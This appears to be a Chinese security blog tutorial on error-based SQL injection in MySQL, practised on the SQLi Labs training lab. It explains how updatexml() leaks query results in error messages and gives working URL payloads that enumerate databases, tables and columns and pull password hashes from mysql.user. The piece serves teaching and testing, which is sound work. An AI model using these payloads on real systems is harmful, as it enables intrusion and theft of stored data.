Web安全:报错注入原理分析,报错注入步骤,报错注入常用函数

「作者主页」:士别三日wyx
「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「推荐专栏」:对网络安全感兴趣的小伙伴可以关注专栏《网络安全自学教程》

报错注入

一、什么是报错注入

报错注入是SQL注入常用的方式之一,利用部分函数报错会返回参数内容的特点,执行SQL语句。

以SQLi Labs靶场的第一关为例,功能很简单:在地址栏输入用户id,页面返回对应的用户信息。

比如,地址栏输入 ?id=1,页面返回id为1的用户名(Dumb)和密码(Dumb):

正常情况下,页面只能返回用户信息,不能返回其他信息。

接下来,我们输入报错注入的payload

sql 复制代码
 ?id=1' and updatexml(1,concat(0x7e,version()),3) -- a

页面的报错信息中返回了数据库的版本:


version() 的位置可以替换成其他需要执行的SQL语句。

接下来,我们一步一步的分析,报错注入是怎样在报错信息中显示这些数据的。

二、执行原理

1. 代码逻辑分析

测试网站的功能很简单:根据id查询用户名和名:

执行流程分为三步:

  1. 用户输入参数(用户id)
  2. 后台执行SQL(查询用户信息)
  3. 查询结果在前端回显

明白网站的功能逻辑以后,我们来了解一下报错注入的核心:updatexml()

2. 报错函数

MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。

我们尝试在查询用户id的同时,使用报错函数,在地址栏输入:?id=1' and updatexml(1, 0x7e, 3) -- a

提示:0x7e 等价于 ~;updatexml() 需要MySQL5.1及以上版本。

参数2包含特殊符号 ~,触发数据库报错,并将参数2的内容显示在报错信息中。

3. 拼接查询结果

如果我们在参数2的位置,将查询语句和特殊符号拼接在一起,就可以将查询结果显示在报错信息中,在地址栏中输入:

sql 复制代码
?id=1' and updatexml(1, concat(0x7e,version()), 3) -- a

参数2内容中的查询结果显示在数据库的报错信息中,并回显到页面。

提示:

  1. version():返回数据库版本
  2. concat():拼接特殊符号和查询结果,函数使用方式可以参考我的另一篇博客:MySQL concat函数使用详解

4. 长度限制

updatexml() 函数的报错内容长度不能超过32个字符,常用的解决方式有两种:

  1. limit 分页
  2. substr()截取字符

4.1 limit 分页

以查询数据库用户为例:

sql 复制代码
?id=-1' and updatexml(1,concat(0x7e,
	(select user
	from mysql.user limit 1,1)
),3) -- a

4.2 substr()截取字符

以查询数据库用户为例:

sql 复制代码
?id=-1' and updatexml(1,concat(0x7e,
	substr(
		(select group_concat(user)
		from mysql.user)
	, 1 , 31)
),3) -- a

理解报错注入的执行原理后,我们整理一下报错注入的步骤。

三、步骤总结

适用情况:页面有数据库的报错信息

复制代码
报错信息必须是动态的、来自数据库的报错信息。
网站写死的、自定义的报错提示不算。

1. 判断是否报错

参数中添加单/双引号,页面报错才可进行下一步。

sql 复制代码
?id=1' -- a

2. 判断报错条件

参数中添加报错函数,检查报错信息是否正常回显

sql 复制代码
?id=1' and updatexml(1,'~',3) -- a

3. 脱库

获取所有数据库

sql 复制代码
?id=-1' and updatexml(1,concat('~',
	substr( 
		(select group_concat(schema_name)
		from information_schema.schemata)
	, 1 , 31)
),3) -- a

获取所有表

sql 复制代码
?id=1' and updatexml(1,concat('~',
	substr( 
		(select group_concat(table_name)
		from information_schema.tables
		where table_schema = 'security')
	, 1 , 31)
),3) -- a

获取所有字段

sql 复制代码
?id=1' and updatexml(1,concat('~',
	substr( 
		(select group_concat(column_name)
		from information_schema.columns
		where table_schema = 'security' and table_name = 'users')
	, 1 , 31)
),3) -- a

四、实战案例

我们拿上面的测试网站(SQLi Labs 第一关)来举例,添加单引号查看是否报错,地址栏输入 ?id=1'

页面出现数据库的报错信息,适合使用报错注入,接下来,获取数据库用户的密码,地址栏输入:

sql 复制代码
?id=-1' and updatexml(1,concat('~',
    substr(
    	(select password 
    	from mysql.user where user='mituan') 
    , 1 , 31)
),3) -- a

报错信息中返回用户密码:

五、常见的报错函数

除了updatexml()外,还有其他的报错函数。

MySQL

  • updatexml(); 第二个参数包含特殊字符会报错
  • extractvalue(); 第二个参数包含特殊字符会报错
  • floor(); 用来取整,不是数值就会报错

SQLserver

  • convert(); 用来类型转换,第二个参数包含特殊字符会报错
  • cast(); 用来类型转换,参数包含特殊字符会报错

Oracle

  • 没有报错函数,可以用比较运算符报错

Access

  • 不支持报错注入,只能使用枚举
相关推荐
初听于你1 小时前
运维高级故障排除与恢复-SysRq
运维·服务器·安全
FreeBuf_2 小时前
现代汽车确认遭遇数据泄露, 攻击者连续窃密9天获取用户驾照信息
安全·web安全·汽车
EkihzniY2 小时前
人证查验一体机:守护医院产房安全
安全
Axis tech2 小时前
如何应用动作捕捉技术让户外重体力工作更安全
科技·安全
2501_915918414 小时前
Flutter 加固方案对比与实战,多工具组合的跨平台安全体系(Flutter App 加固/IPA 成品混淆/Ipa Guard CLI/自动化安全流程)
安全·flutter·ios·小程序·uni-app·自动化·iphone
华硕广东4 小时前
电脑被捆绑软件缠上?3 步根治卡顿弹窗~
科技·安全·技术美术
lingggggaaaa4 小时前
小迪安全v2023学习笔记(一百四十五讲)—— Webshell篇&魔改冰蝎&打乱特征指纹&新增加密协议&过后门查杀&过流量识别
笔记·学习·安全·魔改冰蝎·免杀对抗·免杀技术
Claire_ccat5 小时前
2025山西省网络安全职业技能大赛PWN方向题解
linux·安全·网络安全·pwn·栈溢出
雾迟sec5 小时前
Web安全-文件上传漏洞-黑白名单及其它绕过思路(附思维导图)
javascript·安全·web安全·网络安全·apache·安全威胁分析
newxtc5 小时前
【锦州通APP注册_登录安全-无验证方式导致安全隐患】
人工智能·selenium·测试工具·安全·政务